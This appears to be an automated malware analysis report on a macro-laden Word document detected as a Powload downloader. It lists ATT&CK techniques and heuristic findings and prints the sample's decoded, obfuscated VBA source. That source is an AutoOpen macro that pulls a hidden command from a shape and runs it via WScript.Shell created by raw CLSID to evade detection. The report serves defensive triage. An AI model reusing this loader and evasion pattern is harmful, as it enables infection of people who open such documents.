MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1218.011 System Binary Proxy Execution: Rundll32
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros that leverage the `WScript.Shell` COM object, a known indicator of malicious activity. The `AutoOpen` macro and the reference to PowerShell suggest an attempt to download and execute a secondary payload. The embedded VBA script is heavily obfuscated, but the presence of `WScript.Shell` and the PowerShell reference strongly indicate a downloader or droppper functionality.
Heuristics 9
-
ClamAV: Doc.Malware.Powload-6779192-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6779192-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq)) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq)) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5293 bytes |
SHA-256: 78fc72d9d284507f066b0106f647b2820db8fae4401ff31e83a5943d77e5146a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
110 of 178 identifiers look randomly generated (e.g. 'wIEaqKWmdfnQ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HXbEGlvJu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case qbkOiN
Case 68375030
wwhRw = CBool(AGjGHml)
NtfrmsrU = 84320892
hUGcX = CBool(tTwTqZi)
Case 182965248
CkdEoYC = CBool(JNqjqaS)
clXkd = Atn(XiIMnn)
qnLDUk = CBool(OPYli)
zOjsDtfJO = Atn(263063334 * CLng(73465813))
End Select
On Error Resume Next
Select Case czHQI
Case 166725721
hszikLlr = CBool(cmiUXjT)
vrXinBw = 117412365
QddWKO = CBool(kOaUXd)
Case 270118713
JjFAZpivd = CBool(VQBHuqC)
QvHNGS = Atn(UkIGwHR)
cYGww = CBool(iliAupzMc)
jSKNtn = Atn(315809158 * CLng(169611293))
End Select
On Error Resume Next
Select Case aZmLS
Case 23331969
fTpGzrZfT = CBool(pRbsQkpvp)
ADbqnv = 175747867
aZPhqao = CBool(LIpmOVs)
Case 253360620
DlIKow = CBool(disbrz)
CQAFuf = Atn(aBEmZ)
FCFfLock = CBool(SOmcw)
HiMlM = Atn(272740918 * CLng(257945701))
End Select
Set PwGFdk = Shapes("wIEaqKWmdfnQ")
On Error Resume Next
Select Case vWcwh
Case 169456876
KRNXC = CBool(rtlzEVA)
SlvwEsb = 262111437
uSYlXKPSi = CBool(WwIzT)
Case 136223296
wktYsNod = CBool(ljAdhZW)
SEdnUi = Atn(iZMifJl)
bPvquZC = CBool(jHvYi)
Bawaph = Atn(95267664 * CLng(282738003))
End Select
kaPfk = "" + AEYNli + XtSAK + QAtjZKnM + hFUENkO + PwGFdk.TextFrame.TextRange.Text + opOzvROz + WfjEZIcY + rkhvO
On Error Resume Next
Select Case ralwiamES
Case 103999769
zMWQcKPWV = CBool(QQwPGCkPB)
WZADPq = 274745432
JAXBwv = CBool(LtAjbDzp)
Case 327071244
KmicXCo = CBool(BbZMTA)
VENVWPRD = Atn(uIkjaLWk)
cFDGh = CBool(wikzTGzZ)
zGwmU = Atn(176728640 * CLng(74010118))
End Select
On Error Resume Next
Select Case vUhus
Case 88728886
CMHtkT = CBool(zOokq)
sYtcNKRjv = 39666124
dhjaZiQw = CBool(ioOtDnLI)
Case 309266648
fNjwQWa = CBool(jhwbG)
UQDnh = Atn(kXnCHDK)
YawIo = CBool(aZwkQEz)
jPrHiIZ = Atn(258625567 * CLng(233788732))
End Select
On Error Resume Next
Select Case JlYJsA
Case 31432039
vTPsG = CBool(HSJWNsY)
PrCjKvLsK = 230496179
XmiGSuE = CBool(XZYSsLFq)
Case 262037486
FBUuLWjHL = CBool(JpCJjQjkd)
qbIGAY = Atn(ZJUFFXwFh)
cbHaL = CBool(OciXPlcc)
NcFdsN = Atn(296920009 * CLng(261259652))
End Select
On Error Resume Next
Select Case LzmfZzT
Case 262855450
iaWcVXia = CBool(MFXDpPlL)
MEAfScl = 163112288
plmXoL = CBool(wwXfstHIV)
Case 23239767
EHHWuOaH = CBool(iDIuqwFt)
zoQLMrQO = Atn(iSzsJOph)
KSqXzh = CBool(Mvqcpwo)
SYOVsv = Atn(108606244 * CLng(43866728))
End Select
Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq))
On Error Resume Next
Select Case krBTKrUF
Case 194695741
vNNfCYvb = CBool(EoVRW)
vFFmPrNi = 124189189
YIjjwKvr = CBool(LJshpzz)
Case 165465746
qwOaffOlO = CBool(Nqhiuw)
POrFuti = Atn(KiDXQmQSX)
WUzdBUKv = CBool(dfdazlL)
khkwDjiU = Atn(4037643 * CLng(78007216))
End Select
On Error Resume Next
Select Case WYwRaXkY
Case 25276366
wBFNjZAOX = CBool(AwOiTrjLs)
JILJUm = 18066899
okUvzQz = CBool(TFEcOwUIf)
Case 171130406
OwjoY = CBool(onppvtuW)
amiFzzk = Atn(YiHQAN)
DiucndEw = CBool(PIdHJXMJG)
VidaaMdiL = Atn(62051919 * CLng(114890501))
End Select
Const lGLXjE = 0
On Error Resume Next
Select Case wFctiSnY
Case 26204109
qNcMO = CBool(AVVIOYhbZ)
Iazth = 15729994
WECTE = CBool(NUubTT)
Case 119225001
KwqzQMG = CBool(YYAUaKM)
KXoJFIL = Atn(wDIoUzN)
HhziG = CBool(QpwwjiTkr)
HUQwf = Atn(59551597 * CLng(112995466))
End Select
oZAdYfdi.Run kaPfk, lGLXjE
On Error Resume Next
Select Case lLnAbE
Case 135102571
BXSMjJ = CBool(dHBbJirpA)
FPSRXr = 37736224
XDtuXsw = CBool(lXKfZN)
Case 63365356
bAYBrj = CBool(WmoWpBwif)
hJGwjj = Atn(fuwUi)
lrGDpWT = CBool(nrJXH)
VHMosiTs = Atn(28438263 * CLng(21514151))
End Select
On Error Resume Next
Select Case aACphzKYD
Case 1641119
AwlDuuPO = CBool(QoYSCNi)
XNjpNO = 40906173
ibvAFXpvI = CBool(murKY)
Case 78937904
Xalcj = CBool(TTzBqQzn)
fDPSTOWs = Atn(dJzakTMpX)
pnUXupbh = CBool(WziKQ)
PovGs = Atn(309619591 * CLng(9927627))
End Select
On Error Resume Next
Select Case QQbwObzrP
Case 65138532
jLIBIZDKM = CBool(lUzzTZqhq)
Bwthpckcj = 251331160
aVwrDajK = CBool(vctwfviw)
Case 311297369
HKZPq = CBool(SbMfoada)
LwwHQ = Atn(GXEwYDvCt)
mjfidAGIH = CBool(zXizUwSs)
zfqiCB = Atn(256402581 * CLng(138032789))
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.